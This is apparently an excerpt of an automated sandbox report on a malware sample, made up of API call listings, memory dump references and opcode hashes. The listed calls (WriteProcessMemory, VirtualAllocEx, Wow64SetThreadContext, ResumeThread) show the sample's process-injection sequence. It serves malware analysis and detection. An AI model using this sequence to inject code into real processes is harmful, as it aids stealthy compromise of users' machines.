                                                                                                            • Snapshot File: hcaresult_3_2_b70000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: 41c18f4b132bf92762c5e99c103eb1855f0c99f19599dbc7d802b7afa2a1005d
                                                                                                            • Instruction ID: cf4550232bb8e4b2a410ef08e27b6bf937edb80f7f87071d6e84552d599d3308
                                                                                                            • Opcode Fuzzy Hash: 41c18f4b132bf92762c5e99c103eb1855f0c99f19599dbc7d802b7afa2a1005d
                                                                                                            • Instruction Fuzzy Hash: 0F41E2B0C0071DCEDB24DFA9C884B9EBBF5BF48314F20816AD519AB251DBB56949CF90
                                                                                                            APIs
                                                                                                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 05A10C97
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1808586498.0000000005A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_5a10000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFromIconResource
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070132D0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070132D0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07013126
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070133B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070133B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07013126
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B7E9B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803790583.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_b70000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070131EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070131EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00B7C29E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803790583.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_b70000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0701584D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0701584D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0701584D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1809200287.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_7010000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: 912edec6d5bd2b7f3e0de7a7ff79cda7fa6873e8abb83a690152b811f20703fb
                                                                                                            • Instruction ID: 19537ea5619cd4f9990119cecf2a32b86af42af9a6f80df553cc22092f708c39
                                                                                                            • Opcode Fuzzy Hash: 912edec6d5bd2b7f3e0de7a7ff79cda7fa6873e8abb83a690152b811f20703fb
                                                                                                            • Instruction Fuzzy Hash: D401D0B58003498FDB10CF99D889BDEFBF4EB48320F24845AD559A7250C375AA94CFA5
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNELBASE(?), ref: 00B7FF88
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803790583.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_b70000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: b4bb7ccfb1e686b5db78a34ccded1e031f01254eb16ce1af1f2a954e4d26f5c4
                                                                                                            • Instruction ID: ad8db687f4d7903e9c2e9e0604de8b7a827c0dc778f3bd9112913a066c3daada
                                                                                                            • Opcode Fuzzy Hash: b4bb7ccfb1e686b5db78a34ccded1e031f01254eb16ce1af1f2a954e4d26f5c4
                                                                                                            • Instruction Fuzzy Hash: A51145B28003498FCB10DF9AC445BEEBBF4EB48320F10846AD568A7340D738A944CFA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803576604.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_abd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: debb23ae0be83b41548a102f3f2d1437b87549a5dfd42f595700aac1591cc81e
                                                                                                            • Instruction ID: dfee19c44027a613f13ce45094d982ef2f6e038160d22f9a501c1da21cde8d9c
                                                                                                            • Opcode Fuzzy Hash: debb23ae0be83b41548a102f3f2d1437b87549a5dfd42f595700aac1591cc81e
                                                                                                            • Instruction Fuzzy Hash: 452148B1504200DFDB15DF04D9C0B66BF69FB94328F24C668D90A0B257D336D816CBA2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803607200.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_acd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c3e33ebd9e91f385c87e600f304f70d119512bc2cffc4682530b591094a36893
                                                                                                            • Instruction ID: c6fc35f1eea40bb80205a0a6e9c5fc048b619bf65272040754456772a0d7fe40
                                                                                                            • Opcode Fuzzy Hash: c3e33ebd9e91f385c87e600f304f70d119512bc2cffc4682530b591094a36893
                                                                                                            • Instruction Fuzzy Hash: 1E21CF75604200AFCB14DF18D984F26BBA5FB94324F24C97DD80B4B286C33AD807CA61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803607200.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_acd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d7350899a6f4524702f5f4c3cb91d1eb844ceebd3b12e638f83ddcd50d7dc4dd
                                                                                                            • Instruction ID: c2db5c1e377e44b3d4caaa40014ab6c731b50a20508778cec37e5cdf1e110e27
                                                                                                            • Opcode Fuzzy Hash: d7350899a6f4524702f5f4c3cb91d1eb844ceebd3b12e638f83ddcd50d7dc4dd
                                                                                                            • Instruction Fuzzy Hash: 9E21F2B5604200EFDB05DF14D9C4F26BBA5FB94314F24CA7DE80A4B292C336D806CA61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803607200.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_acd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 24294ea453c98cc209bd00a9c7498dc14019cf642899aa7efd08af2564cff0af
                                                                                                            • Instruction ID: 1cc896ab6a97f5c960a15b151fe41b5aff76f1fd141db7b2458a072c051cac62
                                                                                                            • Opcode Fuzzy Hash: 24294ea453c98cc209bd00a9c7498dc14019cf642899aa7efd08af2564cff0af
                                                                                                            • Instruction Fuzzy Hash: 422183755093808FC702CF24D594B15BF71EB46314F29C5EED84A8F6A7C33A980ACB62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803576604.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_abd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                            • Instruction ID: f15bc737bcb4ac65e7a92345bb489620c63b5fb56fec00aa50ebe4e6d3095849
                                                                                                            • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                            • Instruction Fuzzy Hash: C911D376904240CFDB16CF14D5C4B56BF72FB94328F24C6A9D9090B257C336D85ACBA2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803607200.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_acd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                            • Instruction ID: 092a5022f4ade034f53f1915c13ab76cb0ee959d39f16406194594534b9c587c
                                                                                                            • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                            • Instruction Fuzzy Hash: 7211DD76904280DFCB02CF10C9C4B15FBB2FB84324F24C6AED8494B296C33AD80ACB61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803576604.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_abd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a0a3261d194939437aeb41a63a7213f39eb0fb40e1b9811d4b4ebc745adbacf3
                                                                                                            • Instruction ID: 4580f7c557388596aecf38ffc8522158095f958abc89fade1361f2ad45c792ef
                                                                                                            • Opcode Fuzzy Hash: a0a3261d194939437aeb41a63a7213f39eb0fb40e1b9811d4b4ebc745adbacf3
                                                                                                            • Instruction Fuzzy Hash: 8D01A7710053449AE7105B55DC84BE7BFECDF51325F18C95AED090A287DB799880C6B1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.1803576604.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_abd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8c05a7be912493722f72c67e361d9798475feab7613859507cebe3651faae86d
                                                                                                            • Instruction ID: 03d394ea1e91fb0c7cc9b93ea38ed921a4179341b6873ad495c3c363fa41a5d7
                                                                                                            • Opcode Fuzzy Hash: 8c05a7be912493722f72c67e361d9798475feab7613859507cebe3651faae86d
                                                                                                            • Instruction Fuzzy Hash: DEF062724053449EE7208B16DC84BA7FFACEF51735F18C55AED084A286D779A884CAB1

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:13.4%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:23
                                                                                                            Total number of Limit Nodes:4

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2392861976
                                                                                                            • Opcode ID: 8e4f15b44e058ea9b374504043dcf9f78399042a34ee97da3bfbe8b44603dae5
                                                                                                            • Instruction ID: f04378e012f57108423a495e29fe3775929a0a62eceb3456c362c00b5ccf0592
                                                                                                            • Opcode Fuzzy Hash: 8e4f15b44e058ea9b374504043dcf9f78399042a34ee97da3bfbe8b44603dae5
                                                                                                            • Instruction Fuzzy Hash: 05324F31E1071A8FCB14EF78C89459DB7B2BFC9304F5186A9D509AB624EF30AD85CB91

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q
                                                                                                            • API String ID: 0-355816377
                                                                                                            • Opcode ID: c5f67d4d1f0cd1f664699a83f9575778db5fba3fa1dedaf297c052511f3d702c
                                                                                                            • Instruction ID: 0be8559916c394d2f16544689854e19f96f27fe6ae997f93c4840be6bd6f674d
                                                                                                            • Opcode Fuzzy Hash: c5f67d4d1f0cd1f664699a83f9575778db5fba3fa1dedaf297c052511f3d702c
                                                                                                            • Instruction Fuzzy Hash: 5102AE70B006258FDB54DB68D9906AEB7F2FF84304F15892AE909DB794DB34EC42CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6a3690b6c78c5d50ef055e4752ac18cb13ba456740bb0e59ea5ae2a1cda98bad
                                                                                                            • Instruction ID: d4ed230c1248f48d100debfb6a337728109255016de2254854b1a40599760b6a
                                                                                                            • Opcode Fuzzy Hash: 6a3690b6c78c5d50ef055e4752ac18cb13ba456740bb0e59ea5ae2a1cda98bad
                                                                                                            • Instruction Fuzzy Hash: 1623FA31D10B198ACB11EF68C8946ADF7B1FF99300F15D79AE458B7221EB70AAC5CB41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e1b80761b6b7b02449fc681470cc2622842bc13f5f438f3f3355a51975ccfd57
                                                                                                            • Instruction ID: 87454cce8196a31ecf1e2b86963311cde5d81c7b8cfa163b56769a3907e36e00
                                                                                                            • Opcode Fuzzy Hash: e1b80761b6b7b02449fc681470cc2622842bc13f5f438f3f3355a51975ccfd57
                                                                                                            • Instruction Fuzzy Hash: 86230A31D10B198ACB11EF68C8946ADF7B1FF99300F15D79AE458B7221EB70AAC5CB41
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $
                                                                                                            • API String ID: 0-3993045852
                                                                                                            • Opcode ID: 9ce73c27caf0d5d5a079dade0ec931c5fdcf991b9351370e6cedcbdf4da4b971
                                                                                                            • Instruction ID: 062d34a44f0dfa223e5625e6de41b4113fb3a0abcbb9c4c9a02627fd6a42af1e
                                                                                                            • Opcode Fuzzy Hash: 9ce73c27caf0d5d5a079dade0ec931c5fdcf991b9351370e6cedcbdf4da4b971
                                                                                                            • Instruction Fuzzy Hash: F622DF75E002158FDF60DBA4C4947AEBBF2EF84324F21846AD949EB344DA35DD42CB92
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f1b2854bdf0202a3a5bdef57aba0b49ba166599927d645a6ef7676801cc698a7
                                                                                                            • Instruction ID: 4c78a974e413beed5d7c5654ccc1c5915311cdf031a719c0951466392e0511f5
                                                                                                            • Opcode Fuzzy Hash: f1b2854bdf0202a3a5bdef57aba0b49ba166599927d645a6ef7676801cc698a7
                                                                                                            • Instruction Fuzzy Hash: CA62B034B002148FDB54DB68D554AADB7F2FF84314F658469E90AEB360EB35EC82CB91

                                                                                                            Control-flow Graph (graph image not preserved; legend: Executed / Not Executed)
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: `$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-1655561035
                                                                                                            • Opcode ID: 2b2b340d9c6b96f87ccf5633cc5f1a2ed8a6ac268a94b9506c7c45a14243c967
                                                                                                            • Instruction ID: 35829f733fc6b05394b784df582b491116283753aa125734691730b4442dc938
                                                                                                            • Opcode Fuzzy Hash: 2b2b340d9c6b96f87ccf5633cc5f1a2ed8a6ac268a94b9506c7c45a14243c967
                                                                                                            • Instruction Fuzzy Hash: 70E16D30E102198FDF69DF68D5906AEB7F2FF88304F118929E909EB354DB74D8468B91

                                                                                                            Control-flow Graph (graph image not preserved; legend: Executed / Not Executed)
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731
                                                                                                            • Opcode ID: c5db02aa082fbed98cafb31c177c46bf6ebb8966aeec89b349aa9a2acd3ef785
                                                                                                            • Instruction ID: c141039e0f9740409e211f279ccc79c18528bb59db457abe5eb599a66ee25367
                                                                                                            • Opcode Fuzzy Hash: c5db02aa082fbed98cafb31c177c46bf6ebb8966aeec89b349aa9a2acd3ef785
                                                                                                            • Instruction Fuzzy Hash: AB916F30B0065A9FDF54DB68D9907AEB7F6AFC9204F108569C80DEB784EE709D42CB91

                                                                                                            Control-flow Graph (graph image not preserved; legend: Executed / Not Executed)
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q
                                                                                                            • API String ID: 0-831282457
                                                                                                            • Opcode ID: 6e8563d6bf05a20818649023d33e76dedbf116541d895e9b67f51a137dab96dd
                                                                                                            • Instruction ID: 52fb27796782360a83542de7dbbff9c6178cbe427cc9d1f49fff75907dd74693
                                                                                                            • Opcode Fuzzy Hash: 6e8563d6bf05a20818649023d33e76dedbf116541d895e9b67f51a137dab96dd
                                                                                                            • Instruction Fuzzy Hash: 4F625D34A003158FCB15EB68D580A5EB7F2FF84309B218A29D809DF759DB71ED86CB94

                                                                                                            Control-flow Graph (graph image not preserved; legend: Executed / Not Executed)
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: fcq$XPcq$\Ocq
                                                                                                            • API String ID: 0-3575482020
                                                                                                            • Opcode ID: c5b5518493b56b7e0352304bdd387ada919d4510a55a2c69549aa7fee63e6ed2
                                                                                                            • Instruction ID: 1f894b77de5393f5e26bc06b68ffee84bd92ccf955eaa98ea0a97b0f3ca214a4
                                                                                                            • Opcode Fuzzy Hash: c5b5518493b56b7e0352304bdd387ada919d4510a55a2c69549aa7fee63e6ed2
                                                                                                            • Instruction Fuzzy Hash: 80618030F002189FEB559FA9C8557AEBBF2FB88314F208429E509EB391DF758D458B61

                                                                                                            Control-flow Graph (graph image not preserved; legend: Executed / Not Executed)
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (&^q$(bq
                                                                                                            • API String ID: 0-1294341849
                                                                                                            • Opcode ID: b6e675baea6942a1a29b132cd7f53cca760b5a1419464ccedb81177f7758acf3
                                                                                                            • Instruction ID: d08a6f2d825cc6aedc423a696dd40109fcd0204df9a7d5340c8736511ede6301
                                                                                                            • Opcode Fuzzy Hash: b6e675baea6942a1a29b132cd7f53cca760b5a1419464ccedb81177f7758acf3
                                                                                                            • Instruction Fuzzy Hash: 49717231F002199BDB55EFB8D8506AEBBB2AF84700F548529E505F7381DF34AD06CBA5

                                                                                                            Control-flow Graph (graph image not preserved; legend: Executed / Not Executed)
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q
                                                                                                            • API String ID: 0-355816377

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: fcq$XPcq
                                                                                                            • API String ID: 0-936005338

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2447 298ee3f-298eecc GlobalMemoryStatusEx 2450 298eece-298eed4 2447->2450 2451 298eed5-298eefd 2447->2451 2450->2451
                                                                                                            APIs
                                                                                                            • GlobalMemoryStatusEx.KERNELBASE ref: 0298EEBF
